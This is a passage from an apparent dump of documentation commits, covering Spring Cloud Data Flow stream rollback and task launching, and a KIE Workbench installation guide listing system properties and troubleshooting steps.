spring.cloud.stream.bindings.output.producer.requiredGroups: httptest\n spring.cloud.stream.metrics.properties: 
spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\n server.port: 9000\n spring.cloud.stream.bindings.output.destination: httptest.http\n spring.cloud.dataflow.stream.name: httptest\n spring.cloud.dataflow.stream.app.type: source\n deploymentProperties:\n spring.cloud.deployer.group: httptest\n----\n====\n\nThe majority of the deployment and application properties were set by Data Flow in order to enable the applications to talk to each other and send application metrics with identifying labels.\n\nIf you compare this YAML document to the one for `--releaseVersion=1`, you can see the difference in the log application version.\n\n[[getting-started-local-streams-rollback]]\n==== Rolling Back\n\nTo go back to the previous version of the stream, you can use the `stream rollback` command, as shown (with its output) in the following example:\n\n====\n[source,bash]\n----\ndataflow:>stream rollback --name httptest\nRollback request has been sent for the stream 'httptest'\n----\n====\n\nBy running the Unix `jps` command, you can see the two Java processes running, but now the log application is back to 1.1.0.RELEASE.\nThe `http` source process remains unchanged.\nThe following listing shows the `jps` command and typical output:\n\n====\n[source,bash]\n----\n$ jps | grep rabbit\n22034 http-source-rabbit-1.2.0.RELEASE.jar\n23939 log-sink-rabbit-1.1.0.RELEASE.jar\n----\n====\n\nNow you can look in the log file for the Skipper server by using the following commands:\n\n====\n[source,bash]\n----\ncd \/tmp\/spring-cloud-dataflow-3784227772192239992\/httptest-1511755751505\/httptest.log-v3\ntail -f stdout_0.log\n----\n====\n\nYou should see log entries similar to the following:\n\n====\n[source,bash,options=nowrap]\n----\nINFO 21487 --- [ StateUpdate-2] o.s.c.d.spi.local.LocalAppDeployer : Deploying app with deploymentId httptest.log-v3 instance 0.\n Logs will be in \/tmp\/spring-cloud-dataflow-3784227772192239992\/httptest-1511755751505\/httptest.log-v3\nINFO 21487 --- [ StateUpdate-2] o.s.c.s.s.d.strategies.HealthCheckStep : Waiting for apps in release httptest-v3 to be healthy.\nINFO 21487 --- [ StateUpdate-2] o.s.c.s.s.d.s.HandleHealthCheckStep : Release httptest-v3 has been DEPLOYED\nINFO 21487 --- [ StateUpdate-2] o.s.c.s.s.d.s.HandleHealthCheckStep : Apps in release httptest-v3 are healthy.\n----\n====\n\nNow you can post a message to the http source at port `9000`, as follows:\n\n====\n[source,bash]\n----\ndataflow:> http post --target http:\/\/localhost:9000 --data \"hello world rollback\"\n----\n====\n\nThe log message in the log sink is now back at the info level, as shown in the following example:\n\n====\n[source,bash]\n----\nINFO 23939 --- [http.httptest-1] log-sink : hello world rollback\n----\n====\n\n
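The `stream rollback` command shown above always returns to the version immediately before the current one. To jump straight to a specific earlier version instead, the version can be passed explicitly. The following is a sketch that assumes the `--releaseVersion` option (the same option accepted by `stream manifest`) is also available to `stream rollback` in your version of the shell:\n\n====\n[source,bash]\n----\ndataflow:>stream rollback --name httptest --releaseVersion 1\nRollback request has been sent for the stream 'httptest'\n----\n====\n\nThe `history` command now shows that the third version of the stream has been deployed, as shown (with its output) in the following listing:\n\n====\n[source,bash]\n----\ndataflow:>stream history --name 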
httptest\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n\u2551Version\u2502        Last updated        \u2502 Status \u2502Package Name\u2502Package Version\u2502  Description   \u2551\n\u2560\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563\n\u25513      \u2502Mon Nov 27 23:01:13 EST 2017\u2502DEPLOYED\u2502httptest    \u25021.0.0          \u2502Upgrade complete\u2551\n\u25512      \u2502Mon Nov 27 22:41:16 EST 2017\u2502DELETED \u2502httptest    \u25021.0.0          \u2502Delete complete \u2551\n\u25511      \u2502Mon Nov 27 22:40:41 EST 2017\u2502DELETED \u2502httptest    \u25021.0.0          \u2502Delete complete \u2551\n\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n----\n====\n\nIf you look at the manifest for version 3, you can see that it shows version 1.1.0.RELEASE for the log sink.\n\n\n\n=== Deploying Tasks\n\nThis section shows how to register a task, create a task definition, and then launch the task.\nWe then review information about the task executions.\n\nNOTE: Launching Spring Cloud Task applications does not use delegation to Skipper, since they are short-lived applications. Tasks are always deployed directly through the Data Flow Server.\n\n. Register a Task App\n+\nBy default, the application registry is empty.\nAs an example, we register one task application, `timestamp`, which simply prints the current time to the log.\nThe following command registers the timestamp application:\n+\n====\n[source,bash]\n----\ndataflow:>app register --name timestamp --type task --uri maven:\/\/org.springframework.cloud.task.app:timestamp-task:1.3.0.RELEASE\nSuccessfully registered application 'task:timestamp'\n----\n====\n+\nNOTE: Depending on your environment, you may need to configure the Data Flow Server to point to a custom\nMaven repository location or configure proxy settings. See <<configuration-maven>> for more information.\n
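+\nIf your task artifacts live in a repository other than the default ones, you can point the Data Flow Server at it when you start the server. The following is a sketch of the `maven.remote-repositories.<name>.url` approach described in <<configuration-maven>>; the repository name `repo1`, the unversioned server jar name, and the URL are placeholders for illustration:\n+\n====\n[source,bash]\n----\n$ java -jar spring-cloud-dataflow-server-local.jar --maven.remote-repositories.repo1.url=https:\/\/repo.example.com\/maven2\n----\n====\n\n. 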
Create a Task Definition\n+\nYou can use the `task create` command to create a task definition that uses the previously registered `timestamp` application.\nIn the following example, no additional properties are used to configure the `timestamp` application:\n+\n====\n[source,bash]\n----\ndataflow:> task create --name printTimeStamp --definition \"timestamp\"\n----\n====\n\n. Launch a Task\n+\nThe launching of task definitions is done through the shell's `task launch` command, as the following example shows:\n+\n====\n[source,bash]\n----\ndataflow:> task launch printTimeStamp\n----\n====\n+\nYou should check to see whether the timestamp ended up in the log file for the timestamp task.\nThe location of the log file for the task application appears in the Data Flow server\u2019s log.\nYou should see a log entry similar to the following:\n+\n====\n[source,bash]\n----\nTimestampTaskConfiguration$TimestampTask : 2018-02-28 16:42:21.051\n----\n====\n\n. Review task execution\n+\nYou can obtain information about the task execution by running the `task execution list` command, as the following example (with its output) shows:\n+\n====\n[source,bash]\n----\ndataflow:>task execution list\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n\u2551  Task Name   \u2502ID\u2502         Start Time         \u2502          End Time          \u2502Exit Code\u2551\n\u2560\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563\n\u2551printTimeStamp\u25021 \u2502Wed Feb 28 16:42:21 EST 2018\u2502Wed Feb 28 16:42:21 EST 2018\u25020        \u2551\n\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n----\n====\n+\nYou can obtain additional information by running the command `task execution status`, as the following example (with its output) shows:\n+\n====\n[source,bash]\n----\ndataflow:>task execution status --id 
1\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n\u2551 Key \u2502 Value \u2551\n\u2560\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563\n\u2551Id \u25021 \u2551\n\u2551Name \u2502printTimeStamp \u2551\n\u2551Arguments \u2502[--spring.cloud.task.executionid=1] \u2551\n\u2551Job Execution Ids \u2502[] \u2551\n\u2551Start Time \u2502Wed Feb 28 16:42:21 EST 2018 \u2551\n\u2551End Time \u2502Wed Feb 28 16:42:21 EST 2018 \u2551\n\u2551Exit Code \u25020 \u2551\n\u2551Exit Message \u2502 \u2551\n\u2551Error Message \u2502 \u2551\n\u2551External Execution Id \u2502printTimeStamp-ab86b2cc-0508-4c1e-b33d-b3896d17fed7\u2551\n\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n----\n====\n\nThe <<spring-cloud-dataflow-task>> section has more information on the lifecycle of Tasks and how to use\n<<spring-cloud-dataflow-composed-tasks>>, which let you create a directed graph where each node of the graph is a task application.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b1d0d2e30ab57f2033dce67fc2fda041d43ce35f","subject":"Fix image ref location","message":"Fix image ref location\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/kaui\/Kaui_Guide_Draft.adoc","new_file":"userguide\/kaui\/Kaui_Guide_Draft.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6fe91cdd0b5972246823c46e0167f6078ea841ac","subject":"update description","message":"update description","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/implementation_details.adoc","new_file":"content\/writings\/implementation_details.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"60f0e1d1b645869182984a2b81814387cb3c812c","subject":"AF-1709: Documenting new system property (#1341)","message":"AF-1709: Documenting new system property 
(#1341)\n\n","repos":"manstis\/kie-docs,jomarko\/kie-docs,manstis\/kie-docs,jomarko\/kie-docs,michelehaglund\/kie-docs,michelehaglund\/kie-docs","old_file":"doc-content\/shared-kie-docs\/src\/main\/asciidoc\/Workbench\/Installation\/Installation-section.adoc","new_file":"doc-content\/shared-kie-docs\/src\/main\/asciidoc\/Workbench\/Installation\/Installation-section.adoc","new_contents":"[[_wb.installation]]\n= Installation\n\n[[_wb.warinstallation]]\n== War installation\n\n\nUse the `war` from the workbench distribution zip that corresponds to your application server.\nThe differences between these `war` files are mainly superficial.\nFor example, some JARs might be excluded if the application server already supplies them.\n\n* ``eap7``: tailored for Red Hat JBoss Enterprise Application Platform 7\n* ``wildfly14``: tailored for Wildfly 14\n\n\n[[_wb.workbenchdata]]\n== {CENTRAL} data\n\n\nThe workbench stores its data, by default, in the directory ``$WORKING_DIRECTORY\/.niogit``, for example ``wildfly-14.0.1.Final\/bin\/.niogit``, but it can be overridden with the <<_wb.systemproperties,system property>> ``-Dorg.uberfire.nio.git.dir``.\n\n[NOTE]\n====\nIn production, make sure to back up the workbench data directory.\n====\n\n[[_wb.systemproperties]]\n== System properties\n\n\nHere's a list of all system properties:\n\n* **``org.kie.workbench.profile``**: Selects the workbench profile. Possible values are `FULL` or `PLANNER_AND_RULES`. A prefix `FULL_` will set the profile and hide the profile preferences from the admin preferences. Default: `FULL`.\n* **``kie.maven.offline.force``**: Forces Maven to behave as offline. If true, disables online dependency resolution. Default: false.\n* **``org.appformer.m2repo.url``**: Location of the default Maven repository the workbench uses when looking for dependencies. Usually this points to the Maven repository inside the Workbench, for example ``http:\/\/localhost:8080\/kie-wb\/maven2``. Please set this before starting up the Workbench. Default: File path to the inner m2 repository.\n* **``org.uberfire.nio.git.dir``**: Location of the directory ``$$.$$niogit``. Default: working directory\n* **``org.uberfire.nio.git.dirname``**: Name of the git directory. Default: `.niogit`\n* **``org.uberfire.nio.git.proxy.ssh.over.http``**: Defines that SSH should use an HTTP Proxy. Default: `false`\n* **``http.proxyHost``**: Defines the host name of the HTTP Proxy. Default: `null`\n* **``http.proxyPort``**: Defines the host port (integer value) of the HTTP Proxy. Default: `null`\n* **``org.uberfire.nio.git.proxy.ssh.over.https``**: Defines that SSH should use an HTTPS Proxy. Default: `false`\n* **``https.proxyHost``**: Defines the host name of the HTTPS Proxy. Default: `null`\n* **``https.proxyPort``**: Defines the host port (integer value) of the HTTPS Proxy. Default: `null`\n* **``org.uberfire.nio.git.daemon.enabled``**: Enables\/disables git daemon. Default: `true`\n* **``org.uberfire.nio.git.daemon.host``**: If git daemon enabled, uses this property as local host identifier. Default: `localhost`\n* **``org.uberfire.nio.git.daemon.port``**: If git daemon enabled, uses this property as port number. Default: `9418`\n+\n\n[NOTE]\n====\nIf the default or assigned port is already in use, a new port is automatically selected. Ensure that the ports are available and check the log for more information.\n====\n* **``org.uberfire.nio.git.ssh.enabled``**: Enables\/disables ssh daemon. Default: `true`\n* **``org.uberfire.nio.git.ssh.host``**: If ssh daemon enabled, uses this property as local host identifier. Default: `localhost`\n* **``org.uberfire.nio.git.ssh.port``**: If ssh daemon enabled, uses this property as port number. Default: `8001`\n+\n\n[NOTE]\n====\nIf the default or assigned port is already in use, a new port is automatically selected. Ensure that the ports are available and check the log for more information.\n====\n* **``org.uberfire.nio.git.ssh.cert.dir``**: Location of the directory `$$.$$security` where local certificates will be stored. Default: working directory\n* **``org.uberfire.nio.git.ssh.passphrase``**: Passphrase to access your Operating System's public keystore when cloning `git` repositories with `scp` style URLs; e.g. ``git@github.com:user\/repository.git``.\n* **``org.uberfire.nio.git.ssh.algorithm``**: Algorithm used by SSH. Default: `DSA`\n+\n\n[NOTE]\n====\nIf you plan to use RSA or any algorithm other than DSA, make sure you properly set up your Application Server to use the Bouncy Castle JCE library.\n====\n* **``appformer.ssh.keystore``**: Defines the custom SSH keystore to be used with Workbench by specifying a class name. If the property is not available, the default SSH keystore is used.\n* **``appformer.ssh.keys.storage.folder``**: When using the default SSH keystore, this parameter defines the storage folder for the user's SSH public keys. If the property is not available, the keys are stored in the Workbench ``.security`` folder.\n* **``org.uberfire.metadata.index.dir``**: Place where Lucene `$$.$$index` folder will be stored. Default: working directory\n* **``org.uberfire.ldap.regex.role_mapper``**: Regex pattern used to map LDAP principal names to an application role name. Note that the variable `role` must be part of the pattern as it is substituted by the application role name when matching a principal value to role name. Default: Not used.\n* **``org.uberfire.sys.repo.monitor.disabled``**: Disable configuration monitor (do not disable unless you know what you're doing). Default: `false`\n* **``org.uberfire.secure.key``**: Secret password used by password encryption. Default: `org.uberfire.admin`\n* **``org.uberfire.secure.alg``**: Crypto algorithm used by password encryption. Default: `PBEWithMD5AndDES`\n* **``org.uberfire.domain``**: security-domain name used by uberfire. Default: `ApplicationRealm`\n* **``appformer.experimental.features``**: enables the _Experimental Features Framework_\n* **``org.guvnor.m2repo.dir``**: Place where Maven repository folder will be stored. Default: working-directory\/repositories\/kie\n* **``org.guvnor.project.gav.check.disabled``**: Disable GAV checks. Default: `false`\n* **``org.kie.demo``**: Enables external clone of a demo application from GitHub.\n* **``org.kie.build.disable-project-explorer``**: Disable automatic build of selected Project in Project Explorer. Default: `false`\n* **``org.kie.verification.disable-dtable-realtime-verification``**: Disables the realtime validation and verification of decision tables. Default: `false`\n* **``org.kie.workbench.controller``**: URL for connecting with a {CONTROLLER}, for example: `ws:\/\/localhost:8080\/kie-server-controller\/websocket\/controller`.\n[NOTE]\n====\nOnly Web Socket protocol is supported for connecting with a {HEADLESS_CONTROLLER}.\nWhen specifying this property, the Workbench will automatically disable all the features related to running the embedded {CONTROLLER}.\n====\n* **``org.kie.workbench.controller.user``**: User name for connecting with a {CONTROLLER}. Default: `kieserver`\n* **``org.kie.workbench.controller.pwd``**: Password for connecting with a {CONTROLLER}. Default: `kieserver1!`\n* **``org.kie.workbench.controller.token``**: Token string for connecting with a {CONTROLLER}.\n[NOTE]\n====\nPlease refer to <<usingTokenBasedAuthentication, Using token based authentication>> for more details about how to use token-based authentication.\n====\n* **``kie.keystore.keyStoreURL``**: URL to a keystore which should be used for connecting with a {HEADLESS_CONTROLLER}.\n* **``kie.keystore.keyStorePwd``**: Password to a keystore.\n* **``kie.keystore.key.ctrl.alias``**: Alias of the key where password is stored.\n* **``kie.keystore.key.ctrl.pwd``**: Password of an alias with stored password.\n[NOTE]\n====\nPlease refer to <<_securing_password_using_key_store, Securing password using key store>> for more details about how to use a key store for securing your passwords.\n====\n\nTo change one of these system properties in a WildFly or JBoss EAP cluster:\n\n. Edit the file ``$JBOSS_HOME\/domain\/configuration\/host.xml``.\n. Locate the XML elements `server` that belong to the `main-server-group` and add a system property, for example:\n+\n\n[source,xml]\n----\n<system-properties>\n <property name=\"org.uberfire.nio.git.dir\" value=\"...\" boot-time=\"false\"\/>\n ...\n<\/system-properties>\n----\n\n[[_wb.troubleshooting]]\n== Troubleshooting\n\n[[_wb.troubleshootingloadingspinner]]\n=== Loading... does not disappear and Workbench fails to show\n\n\nThere have been reports that firewalls between the server and the browser can interfere with Server Sent Events (SSE) used by the Workbench.\n\nThe issue results in the \"Loading...\" spinner remaining visible and the Workbench failing to materialize.\n\nThe workaround is to disable the Workbench's use of Server Sent Events by adding file `\/WEB-INF\/classes\/ErraiService.properties` to the exploded WAR containing the value ``errai.bus.enable_sse_support=false``.\nRe-package the WAR and re-deploy.\n\nSome users have also reported that disabling Server Sent Events does not resolve the issue. The solution found to work is to configure the JVM to use a different Entropy Gathering Device on Linux for `SecureRandom`. This can be configured by setting System Property `java.security.egd` to `file:\/dev\/.\/urandom`. See http:\/\/stackoverflow.com\/questions\/33166198\/kie-workbench-not-loading-after-login\/39110177#39110177[this] Stack Overflow post for details.\n\n
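For example, on WildFly or JBoss EAP you could append the setting to `JAVA_OPTS`. The following sketch targets `$JBOSS_HOME\/bin\/standalone.conf` and is illustrative only; adjust the file and syntax for your own installation and startup mechanism:\n\n[source,bash]\n----\n# Illustrative only: use \/dev\/.\/urandom as the entropy gathering device\nJAVA_OPTS=\"$JAVA_OPTS -Djava.security.egd=file:\/dev\/.\/urandom\"\n----\n\nPlease note, however, that this affects the JVM's random number generation and may present other challenges where strong cryptography is required. Configure with caution.\n\n=== Not able to clone KIE Workbench Git repository using ssh protocol.\nGit clients using ssh to interact with the Git server that is bundled with Workbench are authenticated and authorized to perform git commands by the security API that is part of the Uberfire backend server. When using an LDAP security realm, some git clients were not being authorized as expected. 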
This was due to the fact that for non-web clients such as Git via ssh, the principal (i.e., user or group) name assigned to a user by the application server's user registry is the more complex DN associated with that principal by LDAP. The logic of the Uberfire backend server looked for an exact match of roles allowed with the principal name returned and therefore failed.\n\nIt is now possible to control the role-principal matching via the system property\n\n[source, property]\n----\norg.uberfire.ldap.regex.role_mapper\n----\n\nwhich takes as its value a Regex pattern to be applied when matching LDAP principal to role names. The pattern must contain the literal variable name 'role'. During authorization the variable is replaced by each of the allowed application roles. If the pattern is matched, the role is added to the user.\n\nFor instance, if the DN for the admin group in LDAP is\n\n[source, property]\n----\nDN: cn=admin,ou=groups,dc=example,dc=com\n----\n\nand its intended role is admin, then setting `org.uberfire.ldap.regex.role_mapper` with value\n\n[source, regex]\n----\ncn[\\\\ ]*=[\\\\ ]*role\n----\n\nwill find a match on role 'admin'.\n","old_contents":"[[_wb.installation]]\n= Installation\n\n[[_wb.warinstallation]]\n== War installation\n\n\nUse the `war` from the workbench distribution zip that corresponds to your application server.\nThe differences between these `war` files are mainly superficial.\nFor example, some JARs might be excluded if the application server already supplies them.\n\n* ``eap7``: tailored for Red Hat JBoss Enterprise Application Platform 7\n* ``wildfly14``: tailored for Wildfly 14\n\n\n[[_wb.workbenchdata]]\n== {CENTRAL} data\n\n\nThe workbench stores its data, by default, in the directory ``$WORKING_DIRECTORY\/.niogit``, for example ``wildfly-14.0.1.Final\/bin\/.niogit``, but it can be overridden with the <<_wb.systemproperties,system property>> ``-Dorg.uberfire.nio.git.dir``.\n\n[NOTE]\n====\nIn production, make sure to back up the workbench data directory.\n====\n\n[[_wb.systemproperties]]\n== System properties\n\n\nHere's a list of all system properties:\n\n* **``kie.maven.offline.force``**: Forces Maven to behave as offline. If true, disables online dependency resolution. Default: false.\n* **``org.appformer.m2repo.url``**: Location of the default Maven repository the workbench uses when looking for dependencies. Usually this points to the Maven repository inside the Workbench, for example ``http:\/\/localhost:8080\/kie-wb\/maven2``. Please set this before starting up the Workbench. Default: File path to the inner m2 repository.\n* **``org.uberfire.nio.git.dir``**: Location of the directory ``$$.$$niogit``. Default: working directory\n* **``org.uberfire.nio.git.dirname``**: Name of the git directory. Default: `.niogit`\n* **``org.uberfire.nio.git.proxy.ssh.over.http``**: Defines that SSH should use an HTTP Proxy. Default: `false`\n* **``http.proxyHost``**: Defines the host name of the HTTP Proxy. Default: `null`\n* **``http.proxyPort``**: Defines the host port (integer value) of the HTTP Proxy. Default: `null`\n* **``org.uberfire.nio.git.proxy.ssh.over.https``**: Defines that SSH should use an HTTPS Proxy. Default: `false`\n* **``https.proxyHost``**: Defines the host name of the HTTPS Proxy. Default: `null`\n* **``https.proxyPort``**: Defines the host port (integer value) of the HTTPS Proxy. Default: `null`\n* **``org.uberfire.nio.git.daemon.enabled``**: Enables\/disables git daemon. Default: `true`\n* **``org.uberfire.nio.git.daemon.host``**: If git daemon enabled, uses this property as local host identifier. Default: `localhost`\n* **``org.uberfire.nio.git.daemon.port``**: If git daemon enabled, uses this property as port number. Default: `9418`\n+\n\n[NOTE]\n====\nIf the default or assigned port is already in use, a new port is automatically selected. Ensure that the ports are available and check the log for more information.\n====\n* **``org.uberfire.nio.git.ssh.enabled``**: Enables\/disables ssh daemon. Default: `true`\n* **``org.uberfire.nio.git.ssh.host``**: If ssh daemon enabled, uses this property as local host identifier. Default: `localhost`\n* **``org.uberfire.nio.git.ssh.port``**: If ssh daemon enabled, uses this property as port number. Default: `8001`\n+\n\n[NOTE]\n====\nIf the default or assigned port is already in use, a new port is automatically selected. Ensure that the ports are available and check the log for more information.\n====\n* **``org.uberfire.nio.git.ssh.cert.dir``**: Location of the directory `$$.$$security` where local certificates will be stored. Default: working directory\n* **``org.uberfire.nio.git.ssh.passphrase``**: Passphrase to access your Operating System's public keystore when cloning `git` repositories with `scp` style URLs; e.g. ``git@github.com:user\/repository.git``.\n* **``org.uberfire.nio.git.ssh.algorithm``**: Algorithm used by SSH. Default: `DSA`\n+\n\n[NOTE]\n====\nIf you plan to use RSA or any algorithm other than DSA, make sure you properly set up your Application Server to use the Bouncy Castle JCE library.\n====\n* **``appformer.ssh.keystore``**: Defines the custom SSH keystore to be used with Workbench by specifying a class name. If the property is not available, the default SSH keystore is used.\n* **``appformer.ssh.keys.storage.folder``**: When using the default SSH keystore, this parameter defines the storage folder for the user's SSH public keys. If the property is not available, the keys are stored in the Workbench ``.security`` folder.\n* **``org.uberfire.metadata.index.dir``**: Place where Lucene `$$.$$index` folder will be stored. Default: working directory\n* **``org.uberfire.ldap.regex.role_mapper``**: Regex pattern used to map LDAP principal names to an application role name. Note that the variable `role` must be part of the pattern as it is substituted by the application role name when matching a principal value to role name. Default: Not used.\n* **``org.uberfire.sys.repo.monitor.disabled``**: Disable configuration monitor (do not disable unless you know what you're doing). Default: `false`\n* **``org.uberfire.secure.key``**: Secret password used by password encryption. Default: `org.uberfire.admin`\n* **``org.uberfire.secure.alg``**: Crypto algorithm used by password encryption. Default: `PBEWithMD5AndDES`\n* **``org.uberfire.domain``**: security-domain name used by uberfire. Default: `ApplicationRealm`\n* **``appformer.experimental.features``**: enables the _Experimental Features Framework_\n* **``org.guvnor.m2repo.dir``**: Place where Maven repository folder will be stored. Default: working-directory\/repositories\/kie\n* **``org.guvnor.project.gav.check.disabled``**: Disable GAV checks. Default: `false`\n* **``org.kie.demo``**: Enables external clone of a demo application from GitHub.\n* **``org.kie.build.disable-project-explorer``**: Disable automatic build of selected Project in Project Explorer. Default: `false`\n* **``org.kie.verification.disable-dtable-realtime-verification``**: Disables the realtime validation and verification of decision tables. Default: `false`\n* **``org.kie.workbench.controller``**: URL for connecting with a {CONTROLLER}, for example: `ws:\/\/localhost:8080\/kie-server-controller\/websocket\/controller`.\n[NOTE]\n====\nOnly Web Socket protocol is supported for connecting with a {HEADLESS_CONTROLLER}.\nWhen specifying this property, the Workbench will automatically disable all the features related to running the embedded {CONTROLLER}.\n====\n* **``org.kie.workbench.controller.user``**: User name for connecting with a {CONTROLLER}. Default: `kieserver`\n* **``org.kie.workbench.controller.pwd``**: Password for connecting with a {CONTROLLER}. Default: `kieserver1!`\n* **``org.kie.workbench.controller.token``**: Token string for connecting with a {CONTROLLER}.\n[NOTE]\n====\nPlease refer to <<usingTokenBasedAuthentication, Using token based authentication>> for more details about how to use token-based authentication.\n====\n* **``kie.keystore.keyStoreURL``**: URL to a keystore which should be used for connecting with a {HEADLESS_CONTROLLER}.\n* **``kie.keystore.keyStorePwd``**: Password to a keystore.\n* **``kie.keystore.key.ctrl.alias``**: Alias of the key where password is stored.\n* **``kie.keystore.key.ctrl.pwd``**: Password of an alias with stored password.\n[NOTE]\n====\nPlease refer to <<_securing_password_using_key_store, Securing password using key store>> for more details about how to use a key store for securing your passwords.\n====\n\nTo change one of these system properties in a WildFly or JBoss EAP cluster:\n\n. Edit the file ``$JBOSS_HOME\/domain\/configuration\/host.xml``.\n. Locate the XML elements `server` that belong to the `main-server-group` and add a system property, for example:\n+\n\n[source,xml]\n----\n<system-properties>\n <property name=\"org.uberfire.nio.git.dir\" value=\"...\" boot-time=\"false\"\/>\n ...\n<\/system-properties>\n----\n\n[[_wb.troubleshooting]]\n== Troubleshooting\n\n[[_wb.troubleshootingloadingspinner]]\n=== Loading... does not disappear and Workbench fails to show\n\n\nThere have been reports that firewalls between the server and the browser can interfere with Server 